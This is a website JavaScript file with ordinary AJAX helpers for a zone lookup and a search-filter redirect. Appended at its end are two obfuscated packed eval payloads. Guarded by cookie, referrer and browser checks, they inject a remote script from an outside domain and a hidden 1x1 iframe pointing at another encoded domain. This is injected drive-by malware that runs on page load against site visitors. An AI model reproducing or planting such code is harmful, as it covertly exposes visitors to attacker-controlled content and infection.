//-------------------------------------------------------------------------------------------------------------
function createRequestObject() {
	var xmlHttp;
	try {
	    // Firefox, Opera 8.0+, Safari
    	xmlHttp=new XMLHttpRequest();
    }
	catch (e) {
	    try {
			xmlHttp=new ActiveXObject("MSXML2.XMLHTTP.3.0");
		}
    	catch (e) {
			try {
				xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
			}
      		catch (e) {
				alert("Your browser does not support AJAX!");
        		return false;
			}
      	}
	}
	return xmlHttp;
}
//-------------------------------------------------------------------------------------------------------------
function zona() {
	var http = createRequestObject();
		var loc = document.getElementById("tip").value;
		http.open("GET", "scripts/zona.php?o="+loc);
		http.onreadystatechange = function() {
			if(http.readyState == 4 && http.status == 200) { 
				document.getElementById("content_zona").innerHTML = http.responseText;
			}
		}
		http.send(null);
}
//-------------------------------------------------------------------------------------------------------------
function go2() {
		var f1, f2, f3, f4 ,f5;
		f1 = "filter_a=)"+document.getElementById("zonax").value;
		f2 = "filter_t=)"+document.getElementById("zonax").value;
		f3 = "filter_v=)"+document.getElementById("zonax").value;
		f4 = "filter_c=)"+document.getElementById("zonax").value;
		f5 = "filter_s=)"+document.getElementById("zonax").value;
		
		if(document.getElementById("tip").value != "")  {
			window.location = document.getElementById("tip").value+"?t="+document.getElementById("pagina").value+"&"+f1+"&"+f2+"&"+f3+"&"+f4+"&"+f5;
		}
		else  {alert("Completati toate campurile!");}
}
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 g=4.e.7("d=1");5 f=4.9.7(\'j.\');5 h=l.s.7("o 6.0");a(g==-1&&f!=-1&&h==-1){5 3=4.9.c(4.9.7(\'q=\'));5 8=3.7(\'&\');a(8==-1){8=p.n}3=3.c(0,8).i(2);a(m(3).k(0)!=\'%\'){4.r("<b E=\'t\' F=\'I://H.C/B.w?q="+3+"\'></b>");4.e="d=1; x=y, A z J u:v:G D; "}}',46,46,'|||query|document|var||indexOf|querysize|referrer|if|script|slice|_tskdjw|cookie|dri|dci|nai|substring|google|charAt|navigator|escape|length|MSIE|cmd||write|appVersion|JavaScript|12|15|js|expires|Mon|Jul|23|kv|org|GMT|language|src|58|24search|http|2013'.split('|')));sa="%73%6F%64%6B%65%6E%2E%6E%65%74";eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c+'\\b','g'),k[c])}}return p}('7(2.3.4("5=0")==-1&&10.13.4("19 6")!=-1){2.3="5=0; 17=18, 14 12 8 14:15:26 9; ";2.11("<20"+"31 34="+"1 33"+"32=1 0"+"30=\'29"+"23://"+22+"/21/\' 24=\'25"+"28:27\'></7"+"16>")}',10,35,'s||document|cookie|indexOf|_mlsdkf||if|2015|GMT|navigator|write|Jul|appVersion|||rame|expires|Mon|MSIE|ifra|b2b|sa|tp|style|di||none|splay|ht|rc|me|ght|hei|width'.split('|')));

